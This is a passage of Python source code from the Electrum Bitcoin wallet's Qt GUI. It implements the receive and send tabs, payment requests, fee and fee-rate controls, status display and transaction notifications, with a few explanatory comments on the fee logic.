self.network.get_donation_address() if d: host = self.network.get_parameters().host self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host)) else: self.show_error(_('No donation address for this server')) def show_about(self): QMessageBox.about(self, "Electrum", (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" + _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " + _("You do not need to perform regular backups, because your wallet can be " "recovered from a secret phrase that you can memorize or write on paper.") + " " + _("Startup times are instant because it operates in conjunction with high-performance " "servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" + _("Uses icons from the Icons8 icon pack (icons8.com)."))) def show_update_check(self, version=None): self.gui_object._update_check = UpdateCheck(self, version) def show_report_bug(self): msg = ' '.join([ _("Please report any bugs as issues on github:<br/>"), "<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>", _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."), _("Try to explain not only what the bug is, but how it occurs.") ]) self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True) def notify_transactions(self): if self.tx_notification_queue.qsize() == 0: return if not self.wallet.up_to_date: return # no notifications while syncing now = time.time() rate_limit = 20 # seconds if self.tx_notification_last_time + rate_limit > now: return self.tx_notification_last_time = now self.logger.info("Notifying GUI about new transactions") txns = [] while True: try: txns.append(self.tx_notification_queue.get_nowait()) except queue.Empty: break # Combine the transactions if there are at least three if len(txns) >= 3: total_amount = 0 for tx in txns: is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if not is_relevant: continue total_amount += v self.notify(_("{} new transactions: Total amount received in the new transactions {}") .format(len(txns), self.format_amount_and_units(total_amount))) else: for tx in txns: is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if not is_relevant: continue self.notify(_("New transaction: {}").format(self.format_amount_and_units(v))) def notify(self, message): if self.tray: try: # this requires Qt 5.9 self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000) except TypeError: self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000) # custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user def getOpenFileName(self, title, filter = ""): directory = self.config.get('io_dir', os.path.expanduser('~')) fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter) if fileName and directory != os.path.dirname(fileName): self.config.set_key('io_dir', os.path.dirname(fileName), True) return fileName def getSaveFileName(self, title, filename, filter = ""): directory = self.config.get('io_dir', os.path.expanduser('~')) path = os.path.join( directory, filename ) fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter) if fileName and directory != os.path.dirname(fileName): self.config.set_key('io_dir', os.path.dirname(fileName), True) return fileName def timer_actions(self): # Note this runs in the GUI thread if 
self.need_update.is_set(): self.need_update.clear() self.update_wallet() elif not self.wallet.up_to_date: # this updates "synchronizing" progress self.update_status() # resolve aliases # FIXME this is a blocking network call that has a timeout of 5 sec self.payto_e.resolve() # update fee if self.require_fee_update: self.do_update_fee() self.require_fee_update = False self.notify_transactions() def format_amount(self, x, is_diff=False, whitespaces=False): return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces) def format_amount_and_units(self, amount): text = self.format_amount(amount) + ' '+ self.base_unit() x = self.fx.format_amount_and_units(amount) if self.fx else None if text and x: text += ' (%s)'%x return text def format_fee_rate(self, fee_rate): # fee_rate is in sat/kB return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte' def get_decimal_point(self): return self.decimal_point def base_unit(self): return decimal_point_to_base_unit_name(self.decimal_point) def connect_fields(self, window, btc_e, fiat_e, fee_e): def edit_changed(edit): if edit.follows: return edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) fiat_e.is_last_edited = (edit == fiat_e) amount = edit.get_amount() rate = self.fx.exchange_rate() if self.fx else Decimal('NaN') if rate.is_nan() or amount is None: if edit is fiat_e: btc_e.setText("") if fee_e: fee_e.setText("") else: fiat_e.setText("") else: if edit is fiat_e: btc_e.follows = True btc_e.setAmount(int(amount / Decimal(rate) * COIN)) btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) btc_e.follows = False if fee_e: window.update_fee() else: fiat_e.follows = True fiat_e.setText(self.fx.ccy_amount_str( amount * Decimal(rate) / COIN, False)) fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) fiat_e.follows = False btc_e.follows = False fiat_e.follows = False fiat_e.textChanged.connect(partial(edit_changed, fiat_e)) btc_e.textChanged.connect(partial(edit_changed, btc_e)) fiat_e.is_last_edited = False def update_status(self): if not self.wallet: return if self.network is None: text = _("Offline") icon = read_QIcon("status_disconnected.png") elif self.network.is_connected(): server_height = self.network.get_server_height() server_lag = self.network.get_local_height() - server_height fork_str = "_fork" if len(self.network.get_blockchains())>1 else "" # Server height can be 0 after switching to a new server # until we get a headers subscription request response. # Display the synchronizing message in that case. 
if not self.wallet.up_to_date or server_height == 0: num_sent, num_answered = self.wallet.get_history_sync_state_details() text = ("{} ({}/{})" .format(_("Synchronizing..."), num_answered, num_sent)) icon = read_QIcon("status_waiting.png") elif server_lag > 1: text = _("Server is lagging ({} blocks)").format(server_lag) icon = read_QIcon("status_lagging%s.png"%fork_str) else: c, u, x = self.wallet.get_balance() text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c)) if u: text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip()) if x: text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip()) # append fiat balance and price if self.fx.is_enabled(): text += self.fx.get_fiat_status_text(c + u + x, self.base_unit(), self.get_decimal_point()) or '' if not self.network.proxy: icon = read_QIcon("status_connected%s.png"%fork_str) else: icon = read_QIcon("status_connected_proxy%s.png"%fork_str) else: if self.network.proxy: text = "{} ({})".format(_("Not connected"), _("proxy enabled")) else: text = _("Not connected") icon = read_QIcon("status_disconnected.png") self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename())) self.balance_label.setText(text) self.status_button.setIcon( icon ) def update_wallet(self): self.update_status() if self.wallet.up_to_date or not self.network or not self.network.is_connected(): self.update_tabs() def update_tabs(self, wallet=None): if wallet is None: wallet = self.wallet if wallet != self.wallet: return self.history_model.refresh('update_tabs') self.request_list.update() self.address_list.update() self.utxo_list.update() self.contact_list.update() self.invoice_list.update() self.update_completions() def create_history_tab(self): self.history_model = HistoryModel(self) self.history_list = l = HistoryList(self, self.history_model) self.history_model.set_view(self.history_list) l.searchable_list = l toolbar = l.create_toolbar(self.config) toolbar_shown = self.config.get('show_toolbar_history', False) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def show_address(self, addr): from . import address_dialog d = address_dialog.AddressDialog(self, addr) d.exec_() def show_transaction(self, tx, tx_desc = None): '''tx_desc is set only for txs created in the Send tab''' show_transaction(tx, self, tx_desc) def create_receive_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.receive_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) self.receive_address_e = ButtonsLineEdit() self.receive_address_e.addCopyButton(self.app) self.receive_address_e.setReadOnly(True) msg = _('Bitcoin address where the payment should be received. 
Note that each payment request uses a different Bitcoin address.') self.receive_address_label = HelpLabel(_('Receiving address'), msg) self.receive_address_e.textChanged.connect(self.update_receive_qr) self.receive_address_e.textChanged.connect(self.update_receive_address_styling) self.receive_address_e.setFocusPolicy(Qt.ClickFocus) grid.addWidget(self.receive_address_label, 0, 0) grid.addWidget(self.receive_address_e, 0, 1, 1, -1) self.receive_message_e = QLineEdit() grid.addWidget(QLabel(_('Description')), 1, 0) grid.addWidget(self.receive_message_e, 1, 1, 1, -1) self.receive_message_e.textChanged.connect(self.update_receive_qr) self.receive_amount_e = BTCAmountEdit(self.get_decimal_point) grid.addWidget(QLabel(_('Requested amount')), 2, 0) grid.addWidget(self.receive_amount_e, 2, 1) self.receive_amount_e.textChanged.connect(self.update_receive_qr) self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_receive_e.setVisible(False) grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft) self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None) self.expires_combo = QComboBox() self.expires_combo.addItems([i[0] for i in expiration_values]) self.expires_combo.setCurrentIndex(3) self.expires_combo.setFixedWidth(self.receive_amount_e.width()) msg = ' '.join([ _('Expiration date of your request.'), _('This information is seen by the recipient if you send them a signed payment request.'), _('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'), _('The bitcoin address never expires and will always be part of this electrum wallet.'), ]) grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0) grid.addWidget(self.expires_combo, 3, 1) self.expires_label = QLineEdit('') self.expires_label.setReadOnly(1) self.expires_label.setFocusPolicy(Qt.NoFocus) self.expires_label.hide() grid.addWidget(self.expires_label, 3, 1) self.save_request_button = QPushButton(_('Save')) self.save_request_button.clicked.connect(self.save_payment_request) self.new_request_button = QPushButton(_('New')) self.new_request_button.clicked.connect(self.new_payment_request) self.receive_qr = QRCodeWidget(fixedSize=200) self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window() self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor)) self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor)) self.receive_buttons = buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.save_request_button) buttons.addWidget(self.new_request_button) grid.addLayout(buttons, 4, 1, 1, 2) self.receive_requests_label = QLabel(_('Requests')) from .request_list import RequestList self.request_list = RequestList(self) # layout vbox_g = QVBoxLayout() vbox_g.addLayout(grid) vbox_g.addStretch() hbox = QHBoxLayout() hbox.addLayout(vbox_g) hbox.addWidget(self.receive_qr) w = QWidget() w.searchable_list = self.request_list vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.receive_requests_label) vbox.addWidget(self.request_list) vbox.setStretchFactor(self.request_list, 1000) return w def delete_payment_request(self, addr): self.wallet.remove_payment_request(addr, self.config) self.request_list.update() self.clear_receive_tab() def get_request_URI(self, addr): req = self.wallet.receive_requests[addr] message = self.wallet.labels.get(addr, '') amount = req['amount'] extra_query_params = 
{} if req.get('time'): extra_query_params['time'] = str(int(req.get('time'))) if req.get('exp'): extra_query_params['exp'] = str(int(req.get('exp'))) if req.get('name') and req.get('sig'): sig = bfh(req.get('sig')) sig = bitcoin.base_encode(sig, base=58) extra_query_params['name'] = req['name'] extra_query_params['sig'] = sig uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params) return str(uri) def sign_payment_request(self, addr): alias = self.config.get('alias') alias_privkey = None if alias and self.alias_info: alias_addr, alias_name, validated = self.alias_info if alias_addr: if self.wallet.is_mine(alias_addr): msg = _('This payment request will be signed.') + '\n' + _('Please enter your password') password = None if self.wallet.has_keystore_encryption(): password = self.password_dialog(msg) if not password: return try: self.wallet.sign_payment_request(addr, alias, alias_addr, password) except Exception as e: self.show_error(str(e)) return else: return def save_payment_request(self): addr = str(self.receive_address_e.text()) amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() if not message and not amount: self.show_error(_('No message or amount')) return False i = self.expires_combo.currentIndex() expiration = list(map(lambda x: x[1], expiration_values))[i] req = self.wallet.make_payment_request(addr, amount, message, expiration) try: self.wallet.add_payment_request(req, self.config) except Exception as e: self.logger.exception('Error adding payment request') self.show_error(_('Error adding payment request') + ':\n' + str(e)) else: self.sign_payment_request(addr) self.save_request_button.setEnabled(False) finally: self.request_list.update() self.address_list.update() def view_and_paste(self, title, msg, data): dialog = WindowModalDialog(self, title) vbox = QVBoxLayout() label = QLabel(msg) label.setWordWrap(True) vbox.addWidget(label) pr_e = ShowQRTextEdit(text=data) vbox.addWidget(pr_e) vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog))) dialog.setLayout(vbox) dialog.exec_() def export_payment_request(self, addr): r = self.wallet.receive_requests.get(addr) pr = paymentrequest.serialize_request(r).SerializeToString() name = r['id'] + '.bip70' fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70") if fileName: with open(fileName, "wb+") as f: f.write(util.to_bytes(pr)) self.show_message(_("Request saved successfully")) self.saved = True def new_payment_request(self): addr = self.wallet.get_unused_address() if addr is None: if not self.wallet.is_deterministic(): msg = [ _('No more addresses in your wallet.'), _('You are using a non-deterministic wallet, which cannot create new addresses.'), _('If you want to create new addresses, use a deterministic wallet instead.') ] self.show_message(' '.join(msg)) return if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. 
To avoid this situation, use the existing addresses first.\n\nCreate anyway?")): return addr = self.wallet.create_new_address(False) self.set_receive_address(addr) self.expires_label.hide() self.expires_combo.show() self.new_request_button.setEnabled(False) self.receive_message_e.setFocus(1) def set_receive_address(self, addr): self.receive_address_e.setText(addr) self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) def clear_receive_tab(self): try: addr = self.wallet.get_receiving_address() or '' except InternalAddressCorruption as e: self.show_error(str(e)) addr = '' self.receive_address_e.setText(addr) self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) self.expires_label.hide() self.expires_combo.show() def toggle_qr_window(self): from . import qrwindow if not self.qr_window: self.qr_window = qrwindow.QR_Window(self) self.qr_window.setVisible(True) self.qr_window_geometry = self.qr_window.geometry() else: if not self.qr_window.isVisible(): self.qr_window.setVisible(True) self.qr_window.setGeometry(self.qr_window_geometry) else: self.qr_window_geometry = self.qr_window.geometry() self.qr_window.setVisible(False) self.update_receive_qr() def show_send_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab)) def show_receive_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab)) def receive_at(self, addr): if not bitcoin.is_address(addr): return self.show_receive_tab() self.receive_address_e.setText(addr) self.new_request_button.setEnabled(True) def update_receive_qr(self): addr = str(self.receive_address_e.text()) amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() self.save_request_button.setEnabled((amount is not None) or (message != "")) uri = util.create_bip21_uri(addr, amount, message) self.receive_qr.setData(uri) if self.qr_window and self.qr_window.isVisible(): self.qr_window.qrw.setData(uri) def update_receive_address_styling(self): addr = str(self.receive_address_e.text()) if self.wallet.is_used(addr): self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) self.receive_address_e.setToolTip(_("This address has already been used. " "For better privacy, do not reuse it for new payments.")) else: self.receive_address_e.setStyleSheet("") self.receive_address_e.setToolTip("") def set_feerounding_text(self, num_satoshis_added): self.feerounding_text = (_('Additional {} satoshis are going to be added.') .format(num_satoshis_added)) def create_send_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.send_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) from .paytoedit import PayToEdit self.amount_e = BTCAmountEdit(self.get_decimal_point) self.payto_e = PayToEdit(self) msg = _('Recipient of the funds.') + '\n\n'\ + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)') payto_label = HelpLabel(_('Pay to'), msg) grid.addWidget(payto_label, 1, 0) grid.addWidget(self.payto_e, 1, 1, 1, -1) completer = QCompleter() completer.setCaseSensitivity(False) self.payto_e.set_completer(completer) completer.setModel(self.completions) msg = _('Description of the transaction (not mandatory).') + '\n\n'\ + _('The description is not sent to the recipient of the funds. 
It is stored in your wallet file, and displayed in the \'History\' tab.') description_label = HelpLabel(_('Description'), msg) grid.addWidget(description_label, 2, 0) self.message_e = MyLineEdit() grid.addWidget(self.message_e, 2, 1, 1, -1) self.from_label = QLabel(_('From')) grid.addWidget(self.from_label, 3, 0) self.from_list = FromList(self, self.from_list_menu) grid.addWidget(self.from_list, 3, 1, 1, -1) self.set_pay_from([]) msg = _('Amount to be sent.') + '\n\n' \ + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \ + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \ + _('Keyboard shortcut: type "!" to send all your coins.') amount_label = HelpLabel(_('Amount'), msg) grid.addWidget(amount_label, 4, 0) grid.addWidget(self.amount_e, 4, 1) self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_send_e.setVisible(False) grid.addWidget(self.fiat_send_e, 4, 2) self.amount_e.frozen.connect( lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly())) self.max_button = EnterButton(_("Max"), self.spend_max) self.max_button.setFixedWidth(140) self.max_button.setCheckable(True) grid.addWidget(self.max_button, 4, 3) hbox = QHBoxLayout() hbox.addStretch(1) grid.addLayout(hbox, 4, 4) msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\ + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\ + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.') self.fee_e_label = HelpLabel(_('Fee'), msg) def fee_cb(dyn, pos, fee_rate): if dyn: if self.config.use_mempool_fees(): self.config.set_key('depth_level', pos, False) else: self.config.set_key('fee_level', pos, False) else: self.config.set_key('fee_per_kb', fee_rate, False) if fee_rate: fee_rate = Decimal(fee_rate) self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000)) else: self.feerate_e.setAmount(None) self.fee_e.setModified(False) self.fee_slider.activate() self.spend_max() if self.max_button.isChecked() else self.update_fee() self.fee_slider = FeeSlider(self, self.config, fee_cb) self.fee_slider.setFixedWidth(140) def on_fee_or_feerate(edit_changed, editing_finished): edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e if editing_finished: if edit_changed.get_amount() is None: # This is so that when the user blanks the fee and moves on, # we go back to auto-calculate mode and put a fee back. 
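            # Editor's note: only one of the absolute-fee and fee-rate fields may
            # remain user-frozen at a time; clearing the *other* field's
            # "modified" flag below is what enforces that. A hedged worked
            # example of the invariant the pair must satisfy (fee in sat, rate
            # in sat/byte, size in bytes; the numbers are made up):
            #
            #     fee_rate = 10              # sat/byte, user-entered
            #     tx_size = 225              # bytes, estimated
            #     fee = fee_rate * tx_size   # 2250 sat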
edit_changed.setModified(False) else: # edit_changed was edited just now, so make sure we will # freeze the correct fee setting (this) edit_other.setModified(False) self.fee_slider.deactivate() self.update_fee() class TxSizeLabel(QLabel): def setAmount(self, byte_size): self.setText(('x %s bytes =' % byte_size) if byte_size else '') self.size_e = TxSizeLabel() self.size_e.setAlignment(Qt.AlignCenter) self.size_e.setAmount(0) self.size_e.setFixedWidth(140) self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) self.feerate_e = FeerateEdit(lambda: 0) self.feerate_e.setAmount(self.config.fee_per_byte()) self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False)) self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True)) self.fee_e = BTCAmountEdit(self.get_decimal_point) self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False)) self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True)) def feerounding_onclick(): text = (self.feerounding_text + '\n\n' + _('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' + _('At most 100 satoshis might be lost due to this rounding.') + ' ' + _("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' + _('Also, dust is not kept as change, but added to the fee.') + '\n' + _('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.')) self.show_message(title=_('Fee rounding'), msg=text) self.feerounding_icon = QPushButton(read_QIcon('info.png'), '') self.feerounding_icon.setFixedWidth(20) self.feerounding_icon.setFlat(True) self.feerounding_icon.clicked.connect(feerounding_onclick) self.feerounding_icon.setVisible(False) self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e) vbox_feelabel = QVBoxLayout() vbox_feelabel.addWidget(self.fee_e_label) vbox_feelabel.addStretch(1) grid.addLayout(vbox_feelabel, 5, 0) self.fee_adv_controls = QWidget() hbox = QHBoxLayout(self.fee_adv_controls) hbox.setContentsMargins(0, 0, 0, 0) hbox.addWidget(self.feerate_e) hbox.addWidget(self.size_e) hbox.addWidget(self.fee_e) hbox.addWidget(self.feerounding_icon, Qt.AlignLeft) hbox.addStretch(1) vbox_feecontrol = QVBoxLayout() vbox_feecontrol.addWidget(self.fee_adv_controls) vbox_feecontrol.addWidget(self.fee_slider) grid.addLayout(vbox_feecontrol, 5, 1, 1, -1) if not self.config.get('show_fee', False): self.fee_adv_controls.setVisible(False) self.preview_button = EnterButton(_("Preview"), self.do_preview) self.preview_button.setToolTip(_('Display the details of your transaction before signing it.')) self.send_button = EnterButton(_("Send"), self.do_send) self.clear_button = EnterButton(_("Clear"), self.do_clear) buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_button) buttons.addWidget(self.preview_button) buttons.addWidget(self.send_button) grid.addLayout(buttons, 6, 1, 1, 3) self.amount_e.shortcut.connect(self.spend_max) self.payto_e.textChanged.connect(self.update_fee) self.amount_e.textEdited.connect(self.update_fee) def reset_max(text): self.max_button.setChecked(False) enable = not bool(text) and not self.amount_e.isReadOnly() self.max_button.setEnabled(enable) self.amount_e.textEdited.connect(reset_max) self.fiat_send_e.textEdited.connect(reset_max) def entry_changed(): text = "" amt_color = ColorScheme.DEFAULT fee_color = ColorScheme.DEFAULT feerate_color = ColorScheme.DEFAULT if self.not_enough_funds: amt_color, fee_color = 
ColorScheme.RED, ColorScheme.RED feerate_color = ColorScheme.RED text = _("Not enough funds") c, u, x = self.wallet.get_frozen_balance() if c+u+x: text += " ({} {} {})".format( self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen") ) # blue color denotes auto-filled values elif self.fee_e.isModified(): feerate_color = ColorScheme.BLUE elif self.feerate_e.isModified(): fee_color = ColorScheme.BLUE elif self.amount_e.isModified(): fee_color = ColorScheme.BLUE feerate_color = ColorScheme.BLUE else: amt_color = ColorScheme.BLUE fee_color = ColorScheme.BLUE feerate_color = ColorScheme.BLUE self.statusBar().showMessage(text) self.amount_e.setStyleSheet(amt_color.as_stylesheet()) self.fee_e.setStyleSheet(fee_color.as_stylesheet()) self.feerate_e.setStyleSheet(feerate_color.as_stylesheet()) self.amount_e.textChanged.connect(entry_changed) self.fee_e.textChanged.connect(entry_changed) self.feerate_e.textChanged.connect(entry_changed) self.invoices_label = QLabel(_('Invoices')) from .invoice_list import InvoiceList self.invoice_list = InvoiceList(self) vbox0 = QVBoxLayout() vbox0.addLayout(grid) hbox = QHBoxLayout() hbox.addLayout(vbox0) w = QWidget() vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.invoices_label) vbox.addWidget(self.invoice_list) vbox.setStretchFactor(self.invoice_list, 1000) w.searchable_list = self.invoice_list run_hook('create_send_tab', grid) return w def spend_max(self): if run_hook('abort_send', self): return self.max_button.setChecked(True) self.do_update_fee() def update_fee(self): self.require_fee_update = True def get_payto_or_dummy(self): r = self.payto_e.get_recipient() if r: return r return (TYPE_ADDRESS, self.wallet.dummy_address()) def do_update_fee(self): '''Recalculate the fee. If the fee was manually input, retain it, but still build the TX to see if there are enough funds. ''' freeze_fee = self.is_send_fee_frozen() freeze_feerate = self.is_send_feerate_frozen() amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount() if amount is None: if not freeze_fee: self.fee_e.setAmount(None) self.not_enough_funds = False self.statusBar().showMessage('') return outputs, fee_estimator, tx_desc, coins = self.read_send_tab() if not outputs: _type, addr = self.get_payto_or_dummy() outputs = [TxOutput(_type, addr, amount)] is_sweep = bool(self.tx_external_keypairs) make_tx = lambda fee_est: \ self.wallet.make_unsigned_transaction( coins, outputs, self.config, fixed_fee=fee_est, is_sweep=is_sweep) try: tx = make_tx(fee_estimator) self.not_enough_funds = False except (NotEnoughFunds, NoDynamicFeeEstimates) as e: if not freeze_fee: self.fee_e.setAmount(None) if not freeze_feerate: self.feerate_e.setAmount(None) self.feerounding_icon.setVisible(False) if isinstance(e, NotEnoughFunds): self.not_enough_funds = True elif isinstance(e, NoDynamicFeeEstimates): try: tx = make_tx(0) size = tx.estimated_size() self.size_e.setAmount(size) except BaseException: pass return except BaseException: self.logger.exception('') return size = tx.estimated_size() self.size_e.setAmount(size) fee = tx.get_fee() fee = None if self.not_enough_funds else fee # Displayed fee/fee_rate values are set according to user input. # Due to rounding or dropping dust in CoinChooser, # actual fees often differ somewhat. 
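        # Editor's note: a hedged sketch of the reconciliation performed below
        # (quantize_feerate() is the real helper used in this file; the values
        # are illustrative). Whichever side the user controls is kept, the other
        # side is derived from it, and the leftover against the true fee drives
        # the rounding icon:
        #
        #     displayed_feerate = quantize_feerate(fee / size)   # fallback path
        #     displayed_fee = round(displayed_feerate * size)
        #     feerounding = fee - displayed_fee                  # icon shown if abs() >= 1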
        if freeze_feerate or self.fee_slider.is_active():
            displayed_feerate = self.feerate_e.get_amount()
            if displayed_feerate is not None:
                displayed_feerate = quantize_feerate(displayed_feerate)
            else:
                # fallback to actual fee
                displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
                self.feerate_e.setAmount(displayed_feerate)
            displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
            self.fee_e.setAmount(displayed_fee)
        else:
            if freeze_fee:
                displayed_fee = self.fee_e.get_amount()
            else:
                # fallback to actual fee if nothing is frozen
                displayed_fee = fee
                self.fee_e.setAmount(displayed_fee)
            displayed_fee = displayed_fee if displayed_fee else 0
            displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
            self.feerate_e.setAmount(displayed_feerate)

        # show/hide fee rounding icon
        feerounding = (fee - displayed_fee) if fee else 0
        self.set_feerounding_text(int(feerounding))
        self.feerounding_icon.setToolTip(self.feerounding_text)
        self.feerounding_icon.setVisible(abs(feerounding) >= 1)

        if self.max_button.isChecked():
            amount = tx.output_value()
            __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
            amount_after_all_fees = amount - x_fee_amount
            self.amount_e.setAmount(amount_after_all_fees)

    def from_list_delete(self, item):
        i = self.from_list.indexOfTopLevelItem(item)
        self.pay_from.pop(i)
        self.redraw_from_list()
        self.update_fee()

    def from_list_menu(self, position):
        item = self.from_list.itemAt(position)
        menu = QMenu()
        menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
        menu.exec_(self.from_list.viewport().mapToGlobal(position))

    def set_pay_from(self, coins):
        self.pay_from = list(coins)
        self.redraw_from_list()

    def redraw_from_list(self):
        self.from_list.clear()
        self.from_label.setHidden(len(self.pay_from) == 0)
        self.from_list.setHidden(len(self.pay_from) == 0)

        def format(x):
            h = x.get('prevout_hash')
            return h[0:10] + '...' + h[-10:] + ":%d" % x.get('prevout_n') + u'\t' + "%s" % x.get('address')

        for item in self.pay_from:
            self.from_list.addTopLevelItem(QTreeWidgetItem([format(item), self.format_amount(item['value'])]))

    def get_contact_payto(self, key):
        _type, label = self.contacts.get(key)
        return label + ' <' + key + '>' if _type == 'address' else key

    def update_completions(self):
        l = [self.get_contact_payto(key) for key in self.contacts.keys()]
        self.completions.setStringList(l)

    def protected(func):
        '''Password request wrapper.  The password is passed to the function
        as the 'password' named argument.  "None" indicates either an
        unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.''' def request_password(self, *args, **kwargs): parent = self.top_level_window() password = None while self.wallet.has_keystore_encryption(): password = self.password_dialog(parent=parent) if password is None: # User cancelled password input return try: self.wallet.check_password(password) break except Exception as e: self.show_error(str(e), parent=parent) continue kwargs['password'] = password return func(self, *args, **kwargs) return request_password def is_send_fee_frozen(self): return self.fee_e.isVisible() and self.fee_e.isModified() \ and (self.fee_e.text() or self.fee_e.hasFocus()) def is_send_feerate_frozen(self): return self.feerate_e.isVisible() and self.feerate_e.isModified() \ and (self.feerate_e.text() or self.feerate_e.hasFocus()) def get_send_fee_estimator(self): if self.is_send_fee_frozen(): fee_estimator = self.fee_e.get_amount() elif self.is_send_feerate_frozen(): amount = self.feerate_e.get_amount() # sat/byte feerate amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate fee_estimator = partial( simple_config.SimpleConfig.estimate_fee_for_feerate, amount) else: fee_estimator = None return fee_estimator def read_send_tab(self): label = self.message_e.text() if self.payment_request: outputs = self.payment_request.get_outputs() else: outputs = self.payto_e.get_outputs(self.max_button.isChecked()) fee_estimator = self.get_send_fee_estimator() coins = self.get_coins() return outputs, fee_estimator, label, coins def check_send_tab_outputs_and_show_errors(self, outputs) -> bool: """Returns whether there are errors with outputs. Also shows error dialog to user if so. """ pr = self.payment_request if pr: if pr.has_expired(): self.show_error(_('Payment request has expired')) return True if not pr: errors = self.payto_e.get_errors() if errors: self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors])) return True if self.payto_e.is_alias and self.payto_e.validated is False: alias = self.payto_e.toPlainText() msg = _('WARNING: the alias "{}" could not be validated via an additional ' 'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n' msg += _('Do you wish to continue?') if not self.question(msg): return True if not outputs: self.show_error(_('No outputs')) return True for o in outputs: if o.address is None: self.show_error(_('Bitcoin Address is None')) return True if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address): self.show_error(_('Invalid Bitcoin Address')) return True if o.value is None: self.show_error(_('Invalid Amount')) return True return False # no errors def do_preview(self): self.do_send(preview = True) def do_send(self, preview = False): if 